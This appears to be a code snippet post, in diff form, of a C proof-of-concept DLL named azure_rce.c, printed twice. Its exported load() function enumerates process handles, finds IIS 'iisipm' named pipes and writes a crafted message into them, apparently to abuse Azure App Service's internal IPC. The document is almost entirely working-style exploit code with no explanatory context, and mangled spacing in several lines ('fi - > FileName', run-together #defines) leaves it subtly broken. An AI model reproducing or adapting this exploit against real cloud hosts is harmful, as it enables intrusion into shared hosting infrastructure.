ITAYC0HEN · January 23, 2020 09:13
diff --git a/azure_rce.c b/azure_rce.c
 #include <Windows.h>
 #include <stdio.h>
 #include <stdlib.h>

 #pragma warning(disable: 4996)# define MAX_PATH_LEN 2048# define MAX_BUFF_LEN 2048# define IPM_BUFFER_LEN(0x800)

 typedef struct _pipedata {
  unsigned int opcode;
  unsigned int length;
  char data[IPM_BUFFER_LEN];
 }
 PIPE_DATA;

 extern "C"
 __declspec(dllexport) int load(void) {
  FILE * fh = NULL;

  char path[256];
  sprintf(path, "D:\\home\\output_%d_.txt", GetCurrentProcessId());
  fh = fopen(path, "wb");

  if (NULL != fh) {
    int i = 0;
    for (i = 1; i < 10000; i++) {
      DWORD type = GetFileType((HANDLE) i);

      if (FILE_TYPE_PIPE == type) {
        PFILE_NAME_INFO fi;
        DWORD structSize = (MAX_PATH_LEN * sizeof(wchar_t)) + sizeof(FILE_NAME_INFO);
        fi = (PFILE_NAME_INFO) malloc(structSize);

        if (fi == NULL)
          continue;

        memset(fi, 0, structSize);

        if (NULL != fi) {
          if (GetFileInformationByHandleEx((HANDLE) i, FileNameInfo, fi, structSize)) {
            if (wcsstr(fi - > FileName, L "iisipm")) {
              fprintf(fh, "Pipe: %x - %S\n", i, fi - > FileName);
              fflush(fh);

              DWORD writtenBytes = 0;
              OVERLAPPED overlapped;
              memset( & overlapped, 0, sizeof(OVERLAPPED));

              PIPE_DATA pipedata;
              memset( & pipedata, 'a', sizeof(PIPE_DATA));

              pipedata.opcode = 0x0A;
              pipedata.length = 0;
              if (WriteFile((HANDLE) i, & pipedata, sizeof(PIPE_DATA), & writtenBytes, & overlapped)) {
                fprintf(fh, "Successfully writen: %d bytes into %d\n", writtenBytes, i);
                fflush(fh);
              } else {
                fprintf(fh, "Failed to write into %d\n", i);
                fflush(fh);
              }
            }
          } else {
            fprintf(fh, "Error: %x, %d\n", i, GetLastError());
            fflush(fh);
          }

          free(fi);
        }
      }
    }
    fclose(fh);
  }

  return 0;
 }

 BOOL APIENTRY DllMain(HMODULE hModule,
  DWORD ul_reason_for_call,
  LPVOID lpReserved
 ) {
  switch (ul_reason_for_call) {
  case DLL_PROCESS_ATTACH:
  case DLL_THREAD_ATTACH:
  case DLL_THREAD_DETACH:
  case DLL_PROCESS_DETACH:
    break;
  }
  return TRUE;
 }
	#include <Windows.h>
	#include <stdio.h>
	#include <stdlib.h>

	#pragma warning(disable: 4996)# define MAX_PATH_LEN 2048# define MAX_BUFF_LEN 2048# define IPM_BUFFER_LEN(0x800)

	typedef struct _pipedata {
	unsigned int opcode;
	unsigned int length;
	char data[IPM_BUFFER_LEN];
	}
	PIPE_DATA;

	extern "C"
	__declspec(dllexport) int load(void) {
	FILE * fh = NULL;

	char path[256];
	sprintf(path, "D:\\home\\output_%d_.txt", GetCurrentProcessId());
	fh = fopen(path, "wb");

	if (NULL != fh) {
	int i = 0;
	for (i = 1; i < 10000; i++) {
	DWORD type = GetFileType((HANDLE) i);

	if (FILE_TYPE_PIPE == type) {
	PFILE_NAME_INFO fi;
	DWORD structSize = (MAX_PATH_LEN * sizeof(wchar_t)) + sizeof(FILE_NAME_INFO);
	fi = (PFILE_NAME_INFO) malloc(structSize);

	if (fi == NULL)
	continue;

	memset(fi, 0, structSize);

	if (NULL != fi) {
	if (GetFileInformationByHandleEx((HANDLE) i, FileNameInfo, fi, structSize)) {
	if (wcsstr(fi - > FileName, L "iisipm")) {
	fprintf(fh, "Pipe: %x - %S\n", i, fi - > FileName);
	fflush(fh);

	DWORD writtenBytes = 0;
	OVERLAPPED overlapped;
	memset( & overlapped, 0, sizeof(OVERLAPPED));

	PIPE_DATA pipedata;
	memset( & pipedata, 'a', sizeof(PIPE_DATA));

	pipedata.opcode = 0x0A;
	pipedata.length = 0;
	if (WriteFile((HANDLE) i, & pipedata, sizeof(PIPE_DATA), & writtenBytes, & overlapped)) {
	fprintf(fh, "Successfully writen: %d bytes into %d\n", writtenBytes, i);
	fflush(fh);
	} else {
	fprintf(fh, "Failed to write into %d\n", i);
	fflush(fh);
	}
	}
	} else {
	fprintf(fh, "Error: %x, %d\n", i, GetLastError());
	fflush(fh);
	}

	free(fi);
	}
	}
	}
	fclose(fh);
	}

	return 0;
	}

	BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD ul_reason_for_call,
	LPVOID lpReserved
	) {
	switch (ul_reason_for_call) {
	case DLL_PROCESS_ATTACH:
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
	break;
	}
	return TRUE;
	}